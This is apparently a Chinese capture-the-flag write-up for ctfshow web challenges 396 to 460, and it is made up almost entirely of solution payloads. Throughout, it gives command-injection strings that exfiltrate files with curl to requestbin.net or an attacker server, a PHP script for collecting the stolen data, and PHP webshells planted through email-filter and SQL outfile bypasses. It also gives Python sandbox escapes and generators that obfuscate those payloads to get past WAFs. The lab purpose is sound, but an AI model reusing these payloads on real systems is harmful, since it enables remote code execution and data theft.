[CTFSHOW]CTFSHOW-其他WP

文章目录

说在前面

后面部分可能有些地方个别一两题题号写错了,我的锅抱歉

Web396(下面其实有通杀的但是得多试试其他的)

拿到源码

<?php
error_reporting(0);
if(isset($_GET['url'])){
    $url = parse_url($_GET['url']);
    shell_exec('echo '.$url['host'].'> '.$url['path']);

}else{
    highlight_file(__FILE__);
}

内容是把host的内容内容写到path里面

url=http://`ls`/var/www/html/1.php

访问1.php发现fl0g.php

试了下没有结果

url=http://`cat fl0g.php`/var/www/html/3.php

算了没啥意义,直接curl外带吧,requestbin.net自己创一个

?url=http://www.baidu.com/1.php;curl -X POST -d "flag=`cat fl0g.php`" http://requestbin.net/r/1et3jvl1;

Web397-Web401

和上面方法一样

Web402

多加了点正则,说的是schema与host里面不能带这些字符,那我都丢在path里面就好啦

if(preg_match('/http|https/i', $url['scheme'])){
        die('error');
    }
    if(!preg_match('/;|>|\||base/i', $url['host'])){
        shell_exec('echo '.$url['host'].'> /tmp/'.$url['path']);
    }

paylaod

url=www.baidu.com/1.php;curl -X POST -d "flag=`cat fl0g.php`" http://requestbin.net/r/1et3jvl1;

We4b03

error_reporting(0);
if(isset($_GET['url'])){
    $url = parse_url($_GET['url']);
    if(preg_match('/^((2[0-4]\d|25[0-5]|[01]?\d\d?)\.){3}(2[0-4]\d|25[0-5]|[01]?\d\d?)$/', $url['host'])){
        shell_exec('curl '.$url['scheme'].$url['host'].$url['path']);
    }

额没啥水平,就是加了一个正则是匹配指定ip嘛,这个正则不想解释,不懂的建议看一下正则表达式

url=http://227.220.220.21/1.php;curl -X POST -d "flag=`cat fl0g.php`" http://requestbin.net/r/1et3jvl1;

Web404

滑稽是不是发现一直是题目环境没好,F12发现要访问404.php

仔细看正则表达式你会发现和上一题不一样,少了一个^意味着前面部分可操控

这题就不能用requestbin.net了,至于为啥?

rquestbin给我们的url是http://requestbin.net/r/1et3jvl1后面多了两个/r/1let…这在parseurl的时候会默认认为后面是path造成截断,这样是不行的,建议自己本地php环境测试,不多说

解决方法是使用自己的服务器搭建一个类似的功能,先给payload,自己理解,抄答案害自己

404.php?url=http://;curl -X POST -d "q=`cat fl0g.php`" 42.xxx.xxx.xxx;0.0.0.11/f

服务器开启网站服务(只能是80端口),如果拼接:port,parseurl也会绕不过,所以你想nc监听也不行哈

index.php

<?php 
	$cookie = $_POST['q'];
	$myFile = "res.txt";
	file_put_contents($myFile, $cookie, FILE_APPEND);
?>

然后即可访问目录下res.txt获取flag

web405

上一题增强版,schema部分可控制

.://;curl -X POST -d "q=`ls`" 42.xxx.xxx.xxx;0.0.0.11/f
或者
php://;curl -X POST -d "q=`ls`" 42.xxx.xxx.xxx;0.0.0.11/f都行的

Web406

修复了环境了,不能时间盲注但是可以写马

<?php require 'config.php';$sql ='select flag from flag into outfile "/var/www/html/1.txt"';$result = $conn->query($sql);var_dump($result); ?>
转为16进制
http://a53d40ee-9871-49a0-8f4a-5463bc97e052.chall.ctf.show/?url=0://www.baidu.com;'union/**/select/**/1,0x3c3f70687020726571756972652027636f6e6669672e706870273b2473716c203d2773656c65637420666c61672066726f6d20666c616720696e746f206f757466696c6520222f7661722f7777772f68746d6c2f312e74787422273b24726573756c74203d2024636f6e6e2d3e7175657279282473716c293b7661725f64756d702824726573756c74293b203f3e/**/into/**/outfile/**/"/var/www/html/4.php"%23

访问1.txt即可

Web407

IPv6的128位地址通常写成8组,每组为四个十六进制数的形式。比如:AD80:0000:0000:0000:ABAA:0000:00C2:0002 是一个合法的IPv6地址。这个地址比较长,看起来不方便也不易于书写。零压缩法可以用来缩减其长度。如果几个连续段位的值都是0,那么这些0就可以简单的以::来表示

ip=cafe::add

而上面这个形式,刚好也是call_user_func调用类下函数的形式

Web408

payload

email="<?=system($_POST[1]);?>"@123.php

参考p神文章 FILTER_VALIDATE_EMAIL
可以不用点开了,主要是说非法字符可以放在双引号里面绕过检测

Web409

$email="echo`whoami`?>"@123.com

@后面是不符合php语句格式的字符尝试闭合网页当中前面的<?php

可行但是发现前面的"也是非法的
题目有个替换为.flag也就是把flag和它前面那个字符替换为空,这就可以把emai当中前面双引号这个非法字符给替换掉,避免在php环境里面出错

最终paylaod

email="flagsystem($_POST[1]);?>"@123.com
然后post数据
1=cat /flag

web410

?b=on
https://www.w3school.com.cn/php/filter_validate_boolean.asp

web411

?b=oN

web412

ctfshow=?><?php eval($_POST[1]);&1=system(‘cat flag.php’);

web413

ctfshow=/eval($_POST[1]);/&1=system(‘cat flag.php’);

web414

字符串intval为0
ctfshow=-1

web415

不区分大小写
k=getflaG

web416

f=ctf::flag

Web417

群主真骚,搞了一堆这个,经过我十分钟的缜密分析

传入?ctfshow=flag即可获取flag

web418

注意浏览器有进度条
post传入
key=a&clear=;echo cat flag.php > index3.txt;&die=0

web419

限制长度,套娃即可

code=eval($_POST[1]);&1=system('cat flag.php');

web420

code=nl ../*

不知道为啥我curl不行,存个脚本

import requests
import time

payload = [
    '>sh ',
    '>ba\\',
    '>\|\\',
    '>2\\',
    '>2x\\',
    '>xxx.\\',
    '>9x.\\',
    '>1\\',
    '>2.\\',
    '>4\\',
    '>\ \\',
    '>curl\\',
    # '>cu\\',
]

for i in payload:
    # assert len(i) <= 8
    data = {
        'code': str(i)
    }
    r = requests.post('http://6171141f-4d7c-447c-b0f6-1c92f0abd9be.chall.ctf.show/', data=data)
    print(i)
    time.sleep(1)

web421-422

其实有很多,这里我比较懒直接通杀还有诸如ls -t这种

先输入

>cat

再输入

*

web423

?code=str(''.__class__.__bases__[0].__subclasses__()[185].__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').__dict__['pop'+'en']('curl http://xx.xx.xx.xx?1=`cat /flag`'))

web424-web431

一把梭

?code=空格str(open('/flag').read())

web432

http://a43c5775-1d73-4130-9e3f-854ab30caa0b.chall.ctf.show/?code=str(''.__class__.__bases__[0].__subclasses__()[185].__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').__dict__['pop'+'en']('curl http://xx.xx.xx.xx?1=`cat /flag`'))

web433

http://02367530-ac8c-49ca-a771-bc6d431e7e58.chall.ctf.show/?code=str(''.__class__.__bases__[0].__subclasses__()[185].__init__.__globals__['__buil''tins__']['__imp'+'ort__']('o'+'s').__dict__['pop'+'en']('curl http://xx.xx.xx.xx?1=`cat /flag`'))

web434

http://d866760a-411d-4189-90e8-d431736e3a2c.chall.ctf.show/?code=str(''.__class__.__bases__[0].__subclasses__()[185].__init__.__globals__['__buil''tins__']['__imp'+'ort__']('o'+'s').__dict__['pop'+'en']('wget http://xx.xx.xx.xx?1=`cat /fl*`'))

web435-436

?code=str(exec('import o\x73;o\x73.\x73ystem(\"\\u0063\\u0075\\u0072\\u006c\\u0020\\u0068\\u0074\\u0074\\u0070\\u003a\\u002f\\u002f\\u0034\\u0032\\u002e\\u0031\\u0039\\u0032\\u002e\\u0031\\u0033\\u0037\\u002e\\u0032\\u0031\\u0032\\u003f\\u0031\\u003d\\u0060\\u0063\\u0061\\u0074\\u0020\\u002f\\u0066\\u006c\\u0061\\u0067\\u0060\")'))

"{0:c}{1:c}{2:c}{3:c}{4:c}{5:c}{6:c}{7:c}{8:c}{9:c}{10:c}{11:c}{12:c}{13:c}{14:c}{15:c}{16:c}{17:c}{18:c}{19:c}{20:c}{21:c}{22:c}{23:c}{24:c}{25:c}{26:c}{27:c}{28:c}{29:c}{30:c}{31:c}{32:c}{33:c}{34:c}{35:c}{36:c}{37:c}{38:c}{39:c}{40:c}{41:c}{42:c}{43:c}{44:c}{45:c}{46:c}{47:c}{48:c}{49:c}{50:c}{51:c}{52:c}{53:c}{54:c}{55:c}{56:c}{57:c}{58:c}{59:c}{60:c}{61:c}{62:c}".format(105,109,112,111,114,116,32,111,115,59,111,115,46,115,121,115,116,101,109,40,34,99,117,114,108,32,104,116,116,112,58,47,47,52,50,46,49,57,50,46,49,51,55,46,50,49,50,63,49,61,96,99,97,116,32,47,102,108,97,103,96,34,41)

s = 'import os;os.system("curl http://xx.xx.xx.xx?1=`cat /flag`")'
res = '"'
j = 0
for i in s:
    res += ("{"+f"{j}:c"+"}")
    j += 1
res += '".format('
j = 0
for i in s:
    res += f'{ord(i)},'
    j += 1
res = res[:-1]
res = res+")"
print(res)
print(eval(res))

web437-438

?code=str(exec('import o\x73;o\x73.\x73ystem(\"\x63\x75\x72\x6c\x20\x68\x74\x74\x70\x3a\x2f\x2f\x34\x32\x2e\x31\x39\x32\x2e\x31\x33\x37\x2e\x32\x31\x32\x3f\x31\x3d\x60\x63\x61\x74\x20\x2f\x66\x6c\x61\x67\x60")'))

web439-440

s = 'import os;os.system("curl http://xx.xx.xx.xx?1=`cat /flag`")'
res = ''
for i in s:
    res += f"chr({ord(i)})%2B"
print(res[:-3])

code=str(exec(chr(105)%2Bchr(109)%2Bchr(112)%2Bchr(111)%2Bchr(114)%2Bchr(116)%2Bchr(32)%2Bchr(111)%2Bchr(115)%2Bchr(59)%2Bchr(111)%2Bchr(115)%2Bchr(46)%2Bchr(115)%2Bchr(121)%2Bchr(115)%2Bchr(116)%2Bchr(101)%2Bchr(109)%2Bchr(40)%2Bchr(34)%2Bchr(99)%2Bchr(117)%2Bchr(114)%2Bchr(108)%2Bchr(32)%2Bchr(104)%2Bchr(116)%2Bchr(116)%2Bchr(112)%2Bchr(58)%2Bchr(47)%2Bchr(47)%2Bchr(52)%2Bchr(50)%2Bchr(46)%2Bchr(49)%2Bchr(57)%2Bchr(50)%2Bchr(46)%2Bchr(49)%2Bchr(51)%2Bchr(55)%2Bchr(46)%2Bchr(50)%2Bchr(49)%2Bchr(50)%2Bchr(63)%2Bchr(49)%2Bchr(61)%2Bchr(96)%2Bchr(99)%2Bchr(97)%2Bchr(116)%2Bchr(32)%2Bchr(47)%2Bchr(102)%2Bchr(108)%2Bchr(97)%2Bchr(103)%2Bchr(96)%2Bchr(34)%2Bchr(41)))

web441

str().join([chr(105),chr(109),chr(112),chr(111),chr(114),chr(116),chr(32),chr(111),chr(115),chr(59),chr(111),chr(115),chr(46),chr(115),chr(121),chr(115),chr(116),chr(101),chr(109),chr(40),chr(34),chr(99),chr(117),chr(114),chr(108),chr(32),chr(104),chr(116),chr(116),chr(112),chr(58),chr(47),chr(47),chr(52),chr(50),chr(46),chr(49),chr(57),chr(50),chr(46),chr(49),chr(51),chr(55),chr(46),chr(50),chr(49),chr(50),chr(63),chr(49),chr(61),chr(96),chr(99),chr(97),chr(116),chr(32),chr(47),chr(102),chr(108),chr(97),chr(103),chr(96),chr(34),chr(41)])

web442

exec(request.args.get(str(None)))&None=import os;os.system("curl http://xx.xx.xx.xx?1=`cat /flag`")
当然可以构造数字hh
print((len(str(None))*len(str(None))*len(str(None))+len(str(None))))
print(chr(68))

web443

def getNumber3(number):
    number = int(number)
    if number in [-2, -1, 0, 1]:
        return ["~int((len(str(None))/len(str(None))))", "~int(len(str()))",
                "int(len(str()))", "int((len(str(None))/len(str(None))))"][number + 2]

    if number % 2:
        return "~%s" % getNumber3(~number)
    else:
        return "(%s<<(int((len(str(None))/len(str(None))))))" % getNumber3(number / 2)

s = 'import os;os.system("curl http://xxxx?1=`cat /flag`")'
res = 'str().join(['
for i in s:
    res += f"chr({getNumber3(ord(i))}),"
res = res[:-1]
res += '])'
print(res)

web444

def getNumber3(number):
    number = int(number)
    if number in [-2, -1, 0, 1]:
        return ["~int(True)", "~int(False)",
                "int(False)", "int(True)"][number + 2]

    if number % 2:
        return "~%s" % getNumber3(~number)
    else:
        return "(%s<<(int(True)))" % getNumber3(number / 2)


def getNumber2(number):
    number = int(number)
    if number in [-2, -1, 0, 1]:
        return ["~([]<())", "~([]<[])",
                "([]<[])", "([]<())"][number + 2]

    if number % 2:
        return "~%s" % getNumber2(~number)
    else:
        return "(%s<<([]<()))" % getNumber2(number / 2)

s = 'import os;os.system("curl http://xxxx?1=`cat /flag`")'
# s = '123'
res = 'str().join(['
for i in s:
    res += f"chr({getNumber3(ord(i))}),"
res = res[:-1]
res += '])'
print(res)

web445-447

reload重新加载模块

s = 'from importlib import reload;import os;reload(os);os.system("curl http://xxxx?1=`cat /flag`")'

web448

import sys;sys.modules['os']='/usr/local/lib/ python3.8/os.py';import os;os.system() 

或者

Python包的环境变量有很多个,优先sys,waf是读到sys,os为none, 所以报错解决方式可以把他删了,系统找不到就会去下一个环境变量找

import sys
del sys.modules['os']
import os
os.system() 

web449

盲注,思路是这个自己动手,啥都给你了,生成payload的代码我也给了

import time;f=open("/flag").read(1);time.sleep(3) if f=="c" else 2

web450

phpinfo^phpinfo^phpinfo

web451

aaahppo^phphppo^aaainfo

web452

((p).(h).(p).(i).(n).(f).(o))();

web453、455、456

http://f22d6fe3-0c9d-44bb-b78b-a6a8c166a606.chall.ctf.show/ctf/file
s=<?php system('curl http://4x.xxx.xxx7.2xx?1=`ls`'); ?>
http://f22d6fe3-0c9d-44bb-b78b-a6a8c166a606.chall.ctf.show/ctf/exec

web454

http://3adee915-6f8f-4cb2-b195-2180e9a8e272.chall.ctf.show/ctf/file
s=<?php system('curl http://4x.xxx.xxx7.2xx?1=`cat flaaags`'); ?>
http://f22d6fe3-0c9d-44bb-b78b-a6a8c166a606.chall.ctf.show/ctf/include

web457

进入第二个语句即可

?u=admin&p=phpinfo

web458

hint:

get_class (): 获取当前调用方法的类名; 
get_called_class():获取静态绑定后的类名;

web459

hint:

可以配合伪协议得到flag,所以接下来怎么做不多说了,之后访问页面base64解码即可

web460

hint:配合urllib外带数据,感觉题目有点变味了,没啥必要

s = 'import urllib.request;import ssl;f=open("/flag").read(100);context = ssl._create_unverified_context();url = "http://xxx?1="+f;request = urllib.request.Request(url);response = urllib.request.urlopen(url=request,context=context)'
上一篇:fakebook--2018网鼎杯--攻防世界wp


下一篇:将WordPress文章中的外链图片下载到本地